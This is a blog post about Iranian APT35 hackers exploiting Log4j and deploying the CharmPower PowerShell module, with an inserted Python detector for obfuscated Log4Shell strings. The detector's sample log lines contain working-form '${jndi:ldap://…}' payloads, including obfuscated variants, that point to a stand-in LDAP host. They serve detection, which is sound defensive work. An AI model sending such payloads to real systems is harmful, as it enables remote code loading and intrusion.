Saturday, January 15, 2022

Revealed: Iranian State Hackers APT35 AKA CharmingKitten use very bad cybersecurity practices to exploit the Log4j vulnerability and release a new PowerShell Module



Check Point Research has reported that hackers sponsored by the Iranian state, CharmingKitten AKA APT35, have been attempting to use the Log4j vulnerability on public-facing systems to create chaos; however, their attempts have been very poor and have led to easy detection. It was discovered that APT35 had been using an open source Java library named JNDIExploit to attack victims: they send a poisonous payload in an HTTP header, which then builds and returns a malicious Java class, which eventually downloads a PowerShell module called CharmPower from an Amazon S3 URL.
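As an added, defender-side example (not code from the original post, from APT35's tooling, or from Check Point's report): a small Python detector that folds the common Log4Shell obfuscation lookups (`${lower:...}`, `${upper:...}`, `${...:-default}`) before searching logged request headers for a `${jndi:...}` lookup, so that nested variants a naive string match would miss are still flagged. The log lines and IP addresses are constructed for the example.

```python
"""Detect Log4Shell-style JNDI lookup strings in web server log lines,
including nested/obfuscated forms that evade a plain '${jndi:' match."""
import re

# Innermost ${...} expression: its body contains no further '${' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Collapse one innermost lookup into the literal it evaluates to."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)            # keep the real lookup so it is detected
    if ":-" in body:                     # ${env:NaN:-j} or ${::-j} -> default 'j'
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return match.group(0)                # unknown lookup: leave untouched


def normalize(text):
    """Repeatedly fold obfuscation lookups until the string stops changing."""
    while True:
        folded = INNER.sub(_resolve, text)
        if folded == text:
            return folded
        text = folded


def is_log4shell_probe(line):
    """True if the (de-obfuscated) line contains a JNDI lookup."""
    return JNDI.search(normalize(line)) is not None


SAMPLE_LOG = [  # constructed sample lines in a common access-log layout
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.9:1389/a}"',
    '203.0.113.10 - - "GET /?x=${env:HOME} HTTP/1.1" 200 "curl/7.68"',
]


def flag_lines(lines):
    """Return the indexes of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in flag_lines(SAMPLE_LOG):
        print(f"line {i}: {normalize(SAMPLE_LOG[i])}")
```

The last sample line is deliberately a benign `${env:HOME}` lookup that is not flagged; the detector only alerts on lookups that resolve to the `jndi:` prefix.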



[Image: Source code of PowerShell Module]

Once the CharmPower module is implanted on the victim's machine it can do many things. It can verify that a network connection exists and collect system data. It can also install further PowerShell modules for C2 (command-and-control) execution, which means screenshots can be taken from the victim's machine and running processes can be monitored while logs are sent back to the remote server.

Normally with this type of attack it is very difficult to put blame on a group; however, CharmingKitten are well known for using very poor cybersecurity practices, and they have reused code from a previous cyber attack here, which makes blaming them very easy. What amateurs!! 😂😂

It is clear that this is just the start of Iranian regime hackers using the Log4j vulnerability for their evil ways. Please, friends, update your systems to the latest patch and stay alert for the new PowerShell script CharmPower. I will continue to investigate!!
